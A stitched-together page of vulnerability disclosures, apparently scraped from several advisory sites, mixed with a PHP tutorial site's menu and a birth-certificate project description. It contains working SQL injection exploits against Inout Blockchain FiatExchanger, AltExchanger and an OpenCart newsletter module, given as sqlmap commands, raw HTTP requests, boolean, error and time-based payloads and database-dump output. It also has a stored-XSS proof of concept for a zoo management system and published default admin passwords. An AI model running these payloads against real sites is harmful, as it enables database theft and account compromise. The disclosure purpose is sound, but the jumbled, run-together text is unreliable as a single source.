Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php.

**PHP Data Objects (PDO)**

*   PDO – PHP database extension
*   How to use PDO to insert data into the database?
*   How to use PDO to read data from the database?
*   How to use PDO to update the database?
*   How to delete records?
*   PHP CRUD Operation using PDO Extension
*   Signup and Login operation using PDO
*   Password Hashing in PHP using PDO

**PHP OOP Concepts**

*   Basics Of OOPs in PHP
*   How to create classes and objects?
*   The $this keyword
*   Chaining methods and properties
*   Access modifiers: public vs. private
*   Magic Methods
*   The \_\_construct() magic method
*   Inheritance in PHP
*   Multilevel and Multiple inheritances in PHP

**CodeIgniter**

*   CI Introduction
*   CI Directory Structure
*   CI Controllers
*   CI Model
*   CI View
*   CI Libraries
*   CI Helpers
*   CI Plugins
*   How to create form in CI

**HTML**

*   HTML Introduction
*   HTML Useful Tags
*   HTML Text Formats
*   HTML Links
*   HTML Images
*   HTML Lists
*   HTML Forms
*   HTML Table
*   Content Style in HTML

**MySQL**

*   MySQL Introduction
*   MySQL Command-line
*   MySQL GUI Tools
*   MySQL Users
*   MySQL PHP Connections
*   MySQLi Procedural Functions
*   MySQL Data Type
*   MySQL Database and Tables
*   MySQL Column Modifiers

**Interview QAs**

*   PHP Interview Questions and Answers for Fresher
*   Basic PHP Programs
*   PHP Programming/ Logical Interview questions and answers
*   WordPress Interview Questions and Answers
*   MySQL Interview Question and Answers
*   Common SQL Interview Questions and Answers
*   CodeIgniter Interview Questions and Answers

**WordPress**

*   What is wordpress?
*   WordPress.com vs. WordPress.org
*   WordPress Installation
*   Logging Into Your New WordPress Site
*   WordPress Directory and File Structure
*   WordPress DB Structure & Schema

**PHP with Mysqli**

*   How to Connect PHP with MySQL Database
*   How to insert data into MySql using PHP
*   How to fetch data from MySQL using PHP
*   CRUD operation using PHP and MySQLi
*   User Signup and Sign in using HTML and PHP
*   How to change Password in PHP
*   User login and login tracking using PHP
*   How to check Email and username availability live using jquery/ajax
*   jQuery Dependent DropDown List – States and Districts
*   How to Send Mail Using PHP
*   PHP Email Verification Script
*   How to fetch data in excel or generate excel file in PHP
*   How to prevent Cross-Site Request Forgery (CSRF) in PHP
*   User registration with server-side validation using PHP
*   How to create a Shopping Cart in PHP
*   How to delete multiple records in PHP
*   PHP login with remember me function
*   How to create pagination in PHP
*   How to Create pagination using PHP and MySQLi(with the page number)
*   How to Dynamically Add / Remove input fields in PHP with Jquery Ajax
*   How to send email from localhost using PHP
*   How to use multiple insert queries in PHP
*   CRUD operation with Image Using PHP and MySQLi

**Other PHP Tutorials**

*   Time Ago Script in PHP
*   Get City Country By IP Address in PHP
*   Hit counter in PHP
*   Captcha Image Verification in PHP
*   Server Side form Validation in PHP
*   Date And Time Formatting With PHP
*   How to get Current Indian time in PHP
*   How to get Browser Information In PHP
*   How to convert number to String in PHP
*   How to get current page URL in PHP
*   How to get yesterday and tomorrow date in PHP
*   How to change date format in PHP

As technology keeps updating itself… so do we need to. Advancement in technology is the key to innovation through which you enjoy things you couldn’t a decade ago. Similarly, any Programming language basics keep on updating; it is essential for you to also get trained on all the latest features and the basics while learning a programming language.

PHPGurukul provides you with **PHP Latest tutorials** such as PHP CRUD operations using Procedure or MySQL group, and we keep on adding the latest functionalities tutorials to our website. Apart from these tutorials, we offer some great and usual benefits which will help you in your PHP career, and those are below:

*   You can easily get **PHP Projects Idea** through our website, which you would require when you learn PHP and want to try out something on your own. It all starts with an idea, of course.
*   Our website provides **PHP Tutorials for Students,** and you can also purchase Project reports from PHP gurukul for your submissions in college/universities.
*   Any programming language is tough to learn, but it becomes easier and fun to learn when you start with the basics. Our **PHP Tutorials for beginners** help you to learn from the basics till you learn the advanced concepts of PHP.
*   When you are doing web development apart from scripting languages like HTML, JavaScript, you should also know **PHP oops Concepts,** which are well explained in our tutorials to help you excel in PHP.

PHPGurukul also offers **PHP Projects** available for download in a few and easy steps that you can use directly or can customize as per your needs as PHP is an open-source scripting language. You can opt for free PHP Projects or go for our special Paid PHP Projects with additional features that are good for learning and professional usage.

You can enjoy the tutorials with special advanced concepts, go through Interview Q&A, or download the required PHP Projects with Project reports within no time using our website.

CVE-2022-29004: PHP Project, PHP Projects Ideas, PHP Latest tutorials, PHP oops Concept

Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.

**Project Name**

Online Birth Certificate System

**Language Used**

PHP5.6, PHP7.x

**Database**

MySQL 5.x

**User Interface Design**

HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser**

Mozilla, Google Chrome, IE8, OPERA

**Software**

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Last Updated**

09 December 2021

In Online Birth Certificate System we use PHP and MySQL Database. This project has two modules i.e. admin and user.

**Admin Module**

**1\. Home**:  In this section, admin can briefly view the total number of the new applications, total verified application and total rejected the application.

**2\. Birth Application:** In this section, admin views the application details and they have also the right to change application status according to current status.

**3\. Reports:** In this section admin can view the application details in a particular period.

**4\. Search:** In this section, admin can search application with the help of customer  application

Admin can also update his profile, change the password and recover the password.

**User Module**

**1.** **Home Page**: In this section, user can view the welcome page of the web application.

**2.Birth Reg Form**: In this section, user can fill the form of birth certificate and see the status of his/her application.

**3.Certificate:** In this section, user can take print of verified certificates.

Users can also update his profile, change the password and recover the password.

**Some Project Screenshots**

**Birth Certificate From**

**Admin Dashboard**

**Birth Certificate  
  
**

How to run the online Birth Certificate System Project

1.Download the zip file

2.Extract the file and copy obcs folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5.Create a database with name obcsdb

6.Import obcsdb.sql file(given inside the zip package in SQL file folder)

7.Run the script http://localhost/obcs

Admin Credential  
Username: admin  
Password: Test@123

User Credential  
Username: 9632123698  
Password: Test@12345

**View Demo** ——————————————————-

**Download full source code (Online Birth Certificate System)**

**Size: 12.1 MB**

**Version: V 1.2**

**Online Birth Certificate System Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-29005: Online Birth Certificate System Project Using PHP and MySQ -PhpGurukul

Blockchain FiatExchanger version 2.2.1 suffers from a remote blind SQL injection vulnerability.

# Information  
```  
Vulnerability Name  : Remote Blind SQL Injections in Inout Blockchain FiatExchanger  
Product             : Inout Blockchain FiatExchanger  
version             : 2.2.1  
Date                : 2022-05-21  
Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/  
Exploit Detail      : https://github.com/bigb0x/CVEs/blob/main/Inout-Blockchain-FiatExchanger-221-sqli.md  
CVE-Number          : In Progess  
Exploit Author      : Mohamed N. Ali @MohamedNab1l  
```  
<br>

# Description  
<br>

SQL injection attack has been discovered in Blockchain FiatExchanger v2.2.1 platform. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  
<br>

## Vulnerable Parameter: symbol (GET)

<br>

Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php line 130

<br>

### Sqlmap command:  
`  
python sqlmap.py -u "http://http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652675947&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db --dbs --current-user

`  
<br>

### output:  
`  
[20:05:54] [INFO] fetched random HTTP User-Agent header value 'Opera/9.20(Windows NT 5.1; U; en)' from file '/root/sqlmap/data/txt/user-agents.txt'  
[20:05:55] [INFO] testing connection to the target URL  
[20:05:55] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests  
sqlmap resumed the following injection point(s) from stored session:

Parameter: symbol (GET)  
    Type: error-based  
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
    Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 1746 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(1746=1746,1))),0x7171627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hIKU'='hIKU

    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 4566 FROM (SELECT(SLEEP(5)))kVcR) AND 'JGrB'='JGrB

[20:05:55] [INFO] testing MySQL  
[20:05:56] [INFO] confirming MySQL  
[20:05:57] [INFO] the back-end DBMS is MySQL  
[20:05:57] [INFO] fetching banner  
[20:05:57] [INFO] resumed: '5.6.50'  
web application technology: PHP 7.0.33  
back-end DBMS: MySQL >= 5.0.0  
banner: '5.6.50'  
[20:05:57] [INFO] fetching current user  
[20:05:57] [INFO] retrieved: 'root@localhost'  
current user: 'root@localhost'  
[20:05:57] [INFO] fetching current database  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'  
current database: 'inout_blockchain_fiatexchanger_db'  
[20:05:57] [INFO] fetching database names  
[20:05:57] [INFO] resumed: 'information_schema'  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_addons_db'  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_cryptotrading_db'  
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'  
[20:05:57] [INFO] resumed: 'mysql'  
[20:05:57] [INFO] resumed: 'performance_schema'  
available databases [6]:  
[*] information_schema  
[*] inout_blockchain_fiatexchanger_addons_db  
[*] inout_blockchain_fiatexchanger_cryptotrading_db  
[*] inout_blockchain_fiatexchanger_db  
[*] mysql  
[*] performance_schema

`  
<br>  
<img src="./resources/Blockchain-FiatExchanger-221-sqlmap1.png">  
<br>  
<img src="./resources/Blockchain-FiatExchanger-221-sqlmap2.png">  
<br>

## Timeline  
```  
2022-05-03: Discovered the bug  
2022-05-03: Reported to vendor  
2022-05-21: Advisory published  
```

<br>

## Discovered by  
```  
Mohamed N. Ali  
@MohamedNab1l  
ali.mohamed@gmail.com

```

Blockchain FiatExchanger 2.2.1 SQL Injection

Blockchain AltExchanger version 1.2.1 suffers from multiple remote SQL injection vulnerabilities.

    # Information```Vulnerability Name  : Multiple Remote SQL Injections in Inout Blockchain AltExchangerProduct             : Inout Blockchain AltExchangerversion             : 1.2.1Date                : 2022-05-21Vendor Site         : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/Exploit Detail      : https://github.com/bigb0x/CVEs/blob/main/Blockchain-AltExchanger-121-sqli.mdCVE-Number          : In ProgessExploit Author      : Mohamed N. Ali @MohamedNab1l```<br># Description<br>Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.<br>## 1- Vulnerable Parameter: symbol (GET)<br>Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php<br>### Sqlmap command:`python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db`<br>### output:`Parameter: symbol (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO[16:43:22] [INFO] testing MySQL[16:43:23] [INFO] confirming MySQL[16:43:26] [INFO] the back-end DBMS is MySQL[16:43:26] [INFO] fetching banner[16:43:26] [INFO] resumed: 5.6.50web application technology: PHP 7.0.33back-end DBMS: MySQL >= 5.0.0banner: '5.6.50'[16:43:26] [INFO] fetching current database[16:43:26] [INFO] retrieved: inout_blockchain_altexchanger_dbcurrent database: 'inout_blockchain_altexchanger_db'`<br><img src="./resources/Blockchain-AltExchanger-121-sqli-1.png"><br>## 2- Vulnerable Parameter: marketcurrency (POST)<br>Vulnerability File: /index.php/coins/update_marketboxslider<br>### HTTP Request:----------------------------------------------------`POST /index.php/coins/update_marketboxslider HTTP/1.1Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://vulnerable-host.com/Cookie: inoutio_language=4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brContent-Length: 69User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36Host: vulnerable-host.comConnection: Keep-alivedisplaylimit=4&marketcurrency=-INJEQT-SQL-HERE`----------------------------------------------------<br>## 3- Vulnerable Parameter: Cookie: inoutio_language (GET)<br>Vulnerability File: /index.php<br>### HTTP Request:----------------------------------------------------`GET /index.php/home/about HTTP/1.1Referer: https://www.google.com/search?hl=en&q=testingUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36x-requested-with: XMLHttpRequestCookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brHost: vulnerable-host.comConnection: Keep-alive`----------------------------------------------------<br>## Timeline```2022-05-03: Discovered the bug2022-05-03: Reported to vendor2022-05-21: Advisory published```<br>## Discovered by```Mohamed N. Ali@MohamedNab1lali.mohamed at gmail.com```

Blockchain AltExchanger 1.2.1 SQL Injection

OpenCart Newsletter module version 3.0.2.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi# Date: 19/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez# Version: v.3.0.2.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Steps to Reproduce :- Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter- Save request in BurpSuite- Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbsRequest :===========POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: OCSESSID=aaf920777d0aacdee96eb7eb50Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateContent-Length: 29Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Connection: Keep-alivezemez_newsletter_email=saud===========Output :Parameter: zemez_newsletter_email (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- -    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK

OpenCart Newsletter 3.0.2.0 SQL Injection

A vulnerability, which was classified as problematic, has been found in Zoo Management System 1.0. Affected by this issue is /zoo/admin/public_html/view_accounts?type=zookeeper of the content module. The manipulation of the argument admin_name with the input <script>alert(1)</script> leads to an authenticated cross site scripting. Exploit details have been disclosed to the public.

**Zoo Management System - 'admin\_name' Stored Cross-Site Scripting(XSS)****Exploit Title: Zoo Management System - 'admin\_name' Stored Cross-Site Scripting(XSS)****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html****Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database****Version: Zoo Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Zoo Management System does not filter the content correctly at the "content" module, resulting in the generation of stored XSS.

**Payload used:**

<script>alert(111)</script>

**Proof of Concept**

1.  Login the CMS. Admin Default Access: Email: admin@mail.com Password: Password@123
    
2.  Open Page http://172.24.5.102/zoo/admin/public\_html/view\_accounts?type=zookeeper and click Edit button
    
3.  Put XSS payload (<script>alert(111)</script>) in the content box and click on Edit Account to publish the page
    

4.  Viewing the successfully published page,We can see the alert.

CVE-2022-1816: webray.com.cn/Zoo-Management-System(XSS).md at main · Xor-Gerke/webray.com.cn

The WP Contacts Manager WordPress plugin through 2.2.4 fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to an SQL injection vulnerability.

CVE-2022-1014

The Nirweb support WordPress plugin before 2.8.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection

CVE-2022-0781

RegionProtect is a plugin that allows users to manage certain events in certain regions of the world. Versions prior to 1.1.0 contain a YAML injection vulnerability that can cause an instant server crash if the passed arguments are not matched. Version 1.1.0 contains a patch for this issue. As a workaround, restrict operator permissions to untrusted people and avoid entering arguments likely to cause a crash.

@@ -122,6 +122,10 @@ private function getBasicForm(Player $sender): void {

if ($result === null) {

return;

}

if (!preg\_match('/^\[\\w\]+$/', $result\[2\])) {

**This comment has been minimized.**

Sign in to view

Copy link

****SOF3** May 11, 2022**

Author Contributor

I think the best solution is to not use user-provided strings in filenames at all. Why not just store all data in a SQLite3 database?

**This comment has been minimized.**

Sign in to view

Copy link

****NhanAZ** May 11, 2022**

Author Member

You see. This is just a temporary solution on a temporary branch. Looks like @kaidoMC is very busy fixing this, so this is only a temporary solution to the best of my ability.

$sender\->sendMessage(TextFormat::RED . "Invalid region name! Only alphanumeric characters allowed.");

return;

}

if ($result\[2\] != null and $result\[3\] != null) {

$this\->getVectorAdjust()->setLocation($sender, $result\[2\], $result\[3\], \[$X1, $Y1, $Z1\], \[$X2, $Y2, $Z2\]);

} else {

CVE-2022-29215: Patch the hole · kaidomc-pm-pl/RegionProtect@0060d42

Insecure Direct Object References (IDOR) vulnerability in Spiffy Plugins Spiffy Calendar <= 4.9.0 at WordPress allows an attacker to edit or delete events.

Tag

#sql